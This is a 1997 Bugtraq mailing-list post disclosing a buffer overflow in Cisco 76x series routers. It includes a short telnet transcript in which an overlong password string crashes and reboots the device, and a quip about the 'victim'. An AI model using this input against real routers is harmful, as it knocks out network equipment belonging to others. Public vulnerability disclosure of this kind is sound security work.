[5773] in bugtraq
cisco 76x buffer overflow
daemon@ATHENA.MIT.EDU (Laslo Orto)
Thu Dec 11 02:13:16 1997
Date: Thu, 11 Dec 1997 01:11:13 -0500
Reply-To: Laslo Orto <Laslo@CPOL.COM>
From: Laslo Orto <Laslo@CPOL.COM>
To: BUGTRAQ@NETSPACE.ORG
I dont know of anybody ever posting anything on this sbuject, so i'll go
ahed. I found a buffer overflow in the cisco 76x
series router. The bug exists only in the 4 users limit software, i couldnt
reproduce it with the unlimited version.
When i reported the bug to cisco i promised them that i'll post this info to
public if they dont fix it withing a week.
It was over a month ago, and i was never notified of any fix so i'm asuming
they didnt make any fix. I also cant find any
mentioning of this bug on their web site by searching for the bug id.
The exploit is prety simple:
telnet cisco762.domain.com
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
Enter Password:Enter a
veryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyy long string here
and watch the prety lights go on as the cisco reboots, or imagine your
victim tearing his hair out.
